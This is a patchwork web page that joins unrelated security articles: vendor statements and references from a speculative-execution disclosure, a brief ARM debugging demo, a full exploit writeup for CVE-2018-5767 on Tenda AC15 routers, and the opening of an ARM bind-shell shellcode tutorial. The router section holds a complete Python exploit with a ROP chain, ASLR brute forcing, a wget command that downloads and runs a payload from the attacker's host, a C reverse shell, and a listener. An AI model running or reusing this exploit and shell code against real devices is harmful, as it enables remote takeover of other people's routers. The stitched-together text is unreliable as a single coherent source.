The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

int main(void) {

            double myNumber = 1337.77;

 

            std::cout << myNumber << std::endl;

 

            return 0;

}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand that this means we are storing the value at the offset of -12 from register r11 into r2. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset location or specifically stored into 0x7efff230 in memory.

Let’s step into twice which executes the vldr d0, [r11, #-12] as we understand that 1337.77 will now be loaded into the double precision math coprocessor d0 register. Let’s now print the value at that location below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

REMOTE CODE EXECUTION ROP,NX,ASLR (CVE-2018-5767) Tenda’s AC15 router

INTRODUCTION (CVE-2018-5767)

In this post we will be presenting a pre-authenticated remote code execution vulnerability present in Tenda’s AC15 router. We start by analysing the vulnerability, before moving on to our regular pattern of exploit development – identifying problems and then fixing those in turn to develop a working exploit.

N.B – Numerous attempts were made to contact the vendor with no success. Due to the nature of the vulnerability, offset’s have been redacted from the post to prevent point and click exploitation.

LAYING THE GROUNDWORK

The vulnerability in question is caused by a buffer overflow due to unsanitised user input being passed directly to a call to sscanf. The figure below shows the vulnerable code in the R7WebsSecurityHandler function of the HTTPD binary for the device.

Note that the “password=” parameter is part of the Cookie header. We see that the code uses strstr to find this field, and then copies everything after the equals size (excluding a ‘;’ character – important for later) into a fixed size stack buffer.

If we send a large enough password value we can crash the server, in the following picture we have attached to the process using a cross compiled Gdbserver binary, we can access the device using telnet (a story for another post).

This crash isn’t exactly ideal. We can see that it’s due to an invalid read attempting to load a byte from R3 which points to 0x41414141. From our analysis this was identified as occurring in a shared library and instead of looking for ways to exploit it, we turned our focus back on the vulnerable function to try and determine what was happening after the overflow.

In the next figure we see the issue; if the string copied into the buffer contains “.gif”, then the function returns immediately without further processing. The code isn’t looking for “.gif” in the password, but in the user controlled buffer for the whole request. Avoiding further processing of a overflown buffer and returning immediately is exactly what we want (loc_2f7ac simply jumps to the function epilogue).

Appending “.gif” to the end of a long password string of “A”‘s gives us a segfault with PC=0x41414141. With the ability to reliably control the flow of execution we can now outline the problems we must address, and therefore begin to solve them – and so at the same time, develop a working exploit.

To begin with, the following information is available about the binary:

file httpd
format elf
type EXEC (Executable file)
arch arm
bintype elf
bits 32
canary false
endian little
intrp /lib/ld-uClibc.so.0
machine ARM
nx true
pic false
relocs false
relro no
static false

I’ve only included the most important details – mainly, the binary is a 32bit ARMEL executable, dynamically linked with NX being the only exploit mitigation enabled (note that the system has randomize_va_space = 1, which we’ll have to deal with). Therefore, we have the following problems to address:

  1. Gain reliable control of PC through offset of controllable buffer.
  2. Bypass No Execute (NX, the stack is not executable).
  3. Bypass Address space layout randomisation (randomize_va_space = 1).
  4. Chain it all together into a full exploit.

PROBLEM SOLVING 101

The first problem to solve is a general one when it comes to exploiting memory corruption vulnerabilities such as this –  identifying the offset within the buffer at which we can control certain registers. We solve this problem using Metasploit’s pattern create and pattern offset scripts. We identify the correct offset and show reliable control of the PC register:

With problem 1 solved, our next task involves bypassing No Execute. No Execute (NX or DEP) simply prevents us from executing shellcode on the stack. It ensures that there are no writeable and executable pages of memory. NX has been around for a while so we won’t go into great detail about how it works or its bypasses, all we need is some ROP magic.

We make use of the “Return to Zero Protection” (ret2zp) method [1]. The problem with building a ROP chain for the ARM architecture is down to the fact that function arguments are passed through the R0-R3 registers, as opposed to the stack for Intel x86. To bypass NX on an x86 processor we would simply carry out a ret2libc attack, whereby we store the address of libc’s system function at the correct offset, and then a null terminated string at offset+4 for the command we wish to run:

To perform a similar attack on our current target, we need to pass the address of our command through R0, and then need some way of jumping to the system function. The sort of gadget we need for this is a mov instruction whereby the stack pointer is moved into R0. This gives us the following layout:

We identify such a gadget in the libc shared library, however, the gadget performs the following instructions.

mov sp, r0
blx r3

This means that before jumping to this gadget, we must have the address of system in R3. To solve this problem, we simply locate a gadget that allows us to mov or pop values from the stack into R3, and we identify such a gadget again in the libc library:

pop {r3,r4,r7,pc}

This gadget has the added benefit of jumping to SP+12, our buffer should therefore look as such:

Note the ‘;.gif’ string at the end of the buffer, recall that the call to sscanf stops at a ‘;’ character, whilst the ‘.gif’ string will allow us to cleanly exit the function. With the following Python code, we have essentially bypassed NX with two gadgets:

libc_base = ****
curr_libc = libc_base + (0x7c &lt;&lt; 12)
system = struct.pack(«&lt;I», curr_libc + ****)
#: pop {r3, r4, r7, pc}
pop = struct.pack(«&lt;I», curr_libc + ****)
#: mov r0, sp ; blx r3
mv_r0_sp = struct.pack(«&lt;I», curr_libc + ****)
password = «A»*offset
password += pop + system + «B»*8 + mv_r0_sp + command + «.gif»

With problem 2 solved, we now move onto our third problem; bypassing ASLR. Address space layout randomisation can be very difficult to bypass when we are attacking network based applications, this is generally due to the fact that we need some form of information leak. Although it is not enabled on the binary itself, the shared library addresses all load at different addresses on each execution. One method to generate an information leak would be to use “native” gadgets present in the HTTPD binary (which does not have ASLR) and ROP into the leak. The problem here however is that each gadget contains a null byte, and so we can only use 1. If we look at how random the randomisation really is, we see that actually the library addresses (specifically libc which contains our gadgets) only differ by one byte on each execution. For example, on one run libc’s base may be located at 0xXXXXXXXX, and on the next run it is at 0xXXXXXXXX

. We could theoretically guess this value, and we would have a small chance of guessing correct.

This is where our faithful watchdog process comes in. One process running on this device is responsible for restarting services that have crashed, so every time the HTTPD process segfaults, it is immediately restarted, pretty handy for us. This is enough for us to do some naïve brute forcing, using the following process:

With NX and ASLR successfully bypassed, we now need to put this all together (problem 3). This however, provides us with another set of problems to solve:

  1. How do we detect the exploit has been successful?
  2. How do we use this exploit to run arbitrary code on the device?

We start by solving problem 2, which in turn will help us solve problem 1. There are a few steps involved with running arbitrary code on the device. Firstly, we can make use of tools on the device to download arbitrary scripts or binaries, for example, the following command string will download a file from a remote server over HTTP, change its permissions to executable and then run it:

command = «wget http://192.168.0.104/malware -O /tmp/malware &amp;&amp; chmod 777 /tmp/malware &amp;&amp; /tmp/malware &amp;;»

The “malware” binary should give some indication that the device has been exploited remotely, to achieve this, we write a simple TCP connect back program. This program will create a connection back to our attacking system, and duplicate the stdin and stdout file descriptors – it’s just a simple reverse shell.

#include <sys/socket.h>

#include <sys/types.h>

#include <string.h>

#include <stdio.h>

#include <netinet/in.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

socklen_t addrlen;

int sock = socket(AF_INET, SOCK_STREAM, 0);

memset(&addr, 0x00, sizeof(addr));

addr.sin_family = AF_INET;

addr.sin_port = htons(31337);

addr.sin_addr.s_addr = inet_addr(“192.168.0.104”);

int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));

dup2(sock, 0);

dup2(sock, 1);

dup2(sock, 2);

system(“/bin/sh”);

}

We need to cross compile this code into an ARM binary, to do this, we use a prebuilt toolchain downloaded from Uclibc. We also want to automate the entire process of this exploit, as such, we use the following code to handle compiling the malicious code (with a dynamically configurable IP address). We then use a subprocess to compile the code (with the user defined port and IP), and serve it over HTTP using Python’s SimpleHTTPServer module.

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

#write the code with ip and port to a.c

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

#wait for the process to terminate so we can get its return code

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

This code will allow us to utilise the wget tool present on the device to fetch our binary and run it, this in turn will allow us to solve problem 1. We can identify if the exploit has been successful by waiting for connections back. The abstract diagram in the next figure shows how we can make use of a few threads with a global flag to solve problem 1 given the solution to problem 2.

The functions shown in the following code take care of these processes:

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777

/tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base address each time

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d”%i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the process.

time.sleep(1)

 

print “[+] Exploit done”

Finally, we put all of this together by spawning the individual threads, as well as getting command line options as usual:

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”,

help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”,

help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”,

help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your  ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified,

you need a uclibc arm cross compiler,

such as https://www.uclibc.org/downloads/

binaries/0.9.30/cross-compiler-arm4l.tar.bz2″)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

With all of this together, we run the code and after a few minutes get our reverse shell as root:

The full code is here:

#!/usr/bin/env python

import urllib2

import struct

import time

import socket

from optparse import *

import SimpleHTTPServer

import SocketServer

import threading

import sys

import os

import subprocess

 

ARM_REV_SHELL = (

“#include <sys/socket.h>\n”

“#include <sys/types.h>\n”

“#include <string.h>\n”

“#include <stdio.h>\n”

“#include <netinet/in.h>\n”

“int main(int argc, char **argv)\n”

“{\n”

”           struct sockaddr_in addr;\n”

”           socklen_t addrlen;\n”

”           int sock = socket(AF_INET, SOCK_STREAM, 0);\n”

 

”           memset(&addr, 0x00, sizeof(addr));\n”

 

”           addr.sin_family = AF_INET;\n”

”           addr.sin_port = htons(%d);\n”

”           addr.sin_addr.s_addr = inet_addr(\”%s\”);\n”

 

”           int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n”

 

”           dup2(sock, 0);\n”

”           dup2(sock, 1);\n”

”           dup2(sock, 2);\n”

 

”           system(\”/bin/sh\”);\n”

“}\n”

)

 

REV_PORT = 31337

HTTPD_PORT = 8888

DONE = False

 

”’

* This function creates a listening socket on port

* REV_PORT. When a connection is accepted it updates

* the global DONE flag to indicate successful exploitation.

* It then jumps into a loop whereby the user can send remote

* commands to the device, interacting with a spawned /bin/sh

* process.

”’

def threaded_listener():

global DONE

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)

 

host = (“0.0.0.0”, REV_PORT)

 

try:

s.bind(host)

except:

print “[+] Error binding to %d” %REV_PORT

return -1

 

 

print “[+] Connect back listener running on port %d” %REV_PORT

 

s.listen(1)

conn, host = s.accept()

 

#We got a connection, lets make the exploit thread aware

DONE = True

 

print “[+] Got connect back from %s” %host[0]

print “[+] Entering command loop, enter exit to quit”

 

#Loop continuosly, simple reverse shell interface.

while True:

print “#”,

cmd = raw_input()

if cmd == “exit”:

break

if cmd == ”:

continue

 

conn.send(cmd + “\n”)

 

print conn.recv(4096)

 

”’

* Take the ARM_REV_SHELL code and modify it with

* the given ip and port to connect back to.

* This function then compiles the code into an

* ARM binary.

@Param comp_path – This should be the path of the cross-compiler.

@Param my_ip – The IP address of the system running this code.

”’

def compile_shell(comp_path, my_ip):

global ARM_REV_SHELL

outfile = open(“a.c”, “w”)

 

ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)

 

outfile.write(ARM_REV_SHELL)

outfile.close()

 

compile_cmd = [comp_path, “a.c”,”-o”, “a”]

 

s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)

 

while s.poll() == None:

continue

 

if s.returncode == 0:

return True

else:

print “[x] Error compiling code, check compiler? Read the README?”

return False

 

”’

* This function uses the SimpleHTTPServer module to create

* a http server that will serve our malicious binary.

* This function is called as a thread, as a daemon process.

”’

def start_http_server():

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer((“”, HTTPD_PORT), Handler)

 

print “[+] Http server started on port %d” %HTTPD_PORT

httpd.serve_forever()

 

 

”’

* This function presents the actual vulnerability exploited.

* The Cookie header has a password field that is vulnerable to

* a sscanf buffer overflow, we make use of 2 ROP gadgets to

* bypass DEP/NX, and can brute force ASLR due to a watchdog

* process restarting any processes that crash.

* This function will continually make malicious requests to the

* devices web interface until the DONE flag is set to True.

@Param host – the ip address of the target.

@Param port – the port the webserver is running on.

@Param my_ip – The ip address of the attacking system.

”’

def exploit(host, port, my_ip):

global DONE

url = “http://%s:%s/goform/exeCommand”%(host, port)

i = 0

 

command = “wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;” %(my_ip, HTTPD_PORT)

 

#Guess the same libc base continuosly

libc_base = ****

curr_libc = libc_base + (0x7c << 12)

 

system = struct.pack(“<I”, curr_libc + ****)

 

#: pop {r3, r4, r7, pc}

pop = struct.pack(“<I”, curr_libc + ****)

#: mov r0, sp ; blx r3

mv_r0_sp = struct.pack(“<I”, curr_libc + ****)

 

password = “A”*offset

password += pop + system + “B”*8 + mv_r0_sp + command + “.gif”

 

print “[+] Beginning brute force.”

while not DONE:

i += 1

print “[+] Attempt %d” %i

 

#build the request, with the malicious password field

req = urllib2.Request(url)

req.add_header(“Cookie”, “password=%s”%password)

 

#The request will throw an exception when we crash the server,

#we don’t care about this, so don’t handle it.

try:

resp = urllib2.urlopen(req)

except:

pass

 

#Give the device some time to restart the

time.sleep(1)

 

print “[+] Exploit done”

 

 

def main():

parser = OptionParser()

parser.add_option(“-t”, “–target”, dest=”host_ip”, help=”IP address of the target”)

parser.add_option(“-p”, “–port”, dest=”host_port”, help=”Port of the targets webserver”)

parser.add_option(“-c”, “–comp-path”, dest=”compiler_path”, help=”path to arm cross compiler”)

parser.add_option(“-m”, “–my-ip”, dest=”my_ip”, help=”your ip address”)

 

options, args = parser.parse_args()

 

host_ip = options.host_ip

host_port = options.host_port

comp_path = options.compiler_path

my_ip = options.my_ip

 

if host_ip == None or host_port == None:

parser.error(“[x] A target ip address (-t) and port (-p) are required”)

 

if comp_path == None:

parser.error(“[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2”)

 

if my_ip == None:

parser.error(“[x] Please pass your ip address (-m)”)

 

 

if not compile_shell(comp_path, my_ip):

print “[x] Exiting due to error in compiling shell”

return -1

 

httpd_thread = threading.Thread(target=start_http_server)

httpd_thread.daemon = True

httpd_thread.start()

 

conn_listener = threading.Thread(target=threaded_listener)

conn_listener.start()

 

#Give the thread a little time to start up, and fail if that happens

time.sleep(3)

 

if not conn_listener.is_alive():

print “[x] Exiting due to conn_listener error”

return -1

 

 

exploit(host_ip, host_port, my_ip)

 

 

conn_listener.join()

 

return 0

 

 

 

if __name__ == ‘__main__’:

main()

TCP Bind Shell in Assembly (ARM 32-bit)

In this tutorial, you will learn how to write TCP bind shellcode that is free of null bytes and can be used as shellcode for exploitation. When I talk about exploitation, I’m strictly referring to approved and legal vulnerability research. For those of you relatively new to software exploitation, let me tell you that this knowledge can, in fact, be used for good. If I find a software vulnerability like a stack overflow and want to test its exploitability, I need working shellcode. Not only that, I need techniques to use that shellcode in a way that it can be executed despite the security measures in place. Only then I can show the exploitability of this vulnerability and the techniques malicious attackers could be using to take advantage of security flaws.

After going through this tutorial, you will not only know how to write shellcode that binds a shell to a local port, but also how to write any shellcode for that matter. To go from bind shellcode to reverse shellcode is just about changing 1-2 functions, some parameters, but most of it is the same. Writing a bind or reverse shell is more difficult than creating a simple execve() shell. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:

Before we start, I’d like to remind you that we’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?

UNDERSTANDING THE DETAILS

First of all, what is a bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system.

This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system.

 

Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done.

To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell:

  1. Create a new TCP socket
  2. Bind socket to a local port
  3. Listen for incoming connections
  4. Accept incoming connection
  5. Redirect STDIN, STDOUT and STDERR to a newly created socket from a client
  6. Spawn the shell

This is the C code we will use for our translation.

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}
STAGE ONE: SYSTEM FUNCTIONS AND THEIR PARAMETERS

The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, dup2, execve. You can figure out the system call numbers of these functions with the following command:

pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
#define __NR_socketcall             (__NR_SYSCALL_BASE+102)
#define __NR_socket                 (__NR_SYSCALL_BASE+281)
#define __NR_socketpair             (__NR_SYSCALL_BASE+288)
#undef __NR_socketcall

If you’re wondering about the value of _NR_SYSCALL_BASE, it’s 0:

root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0

These are all the syscall numbers we’ll need:

#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)

The parameters each function expects can be looked up in the linux man pages, or on w3challs.com.

The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful bind shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux Kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.

Terminal 1:
pi@raspberrypi:~/bindshell $ gcc bind_test.c -o bind_test
pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q  Send-Q  Local Address  Foreign Address  State     PID/Program name
tcp    0      0       0.0.0.0:22     0.0.0.0:*        LISTEN    - 
tcp    0      0       0.0.0.0:4444   0.0.0.0:*        LISTEN    1058/bind_test 
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!

This is our strace output:

pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 2) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", [0], [/* 0 vars */]) = 0

Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.

STAGE TWO: STEP BY STEP TRANSLATION

In the first stage, we answered the following questions to get everything we need for our assembly program:

  1. Which functions do I need?
  2. What are the system call numbers of these functions?
  3. What are the parameters of these functions?
  4. What are the values of these parameters?

This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:

  1. Map out which register you want to use for which parameter
  2. Figure out how to pass the required values to these registers
    1. How to pass an immediate value to a register
    2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
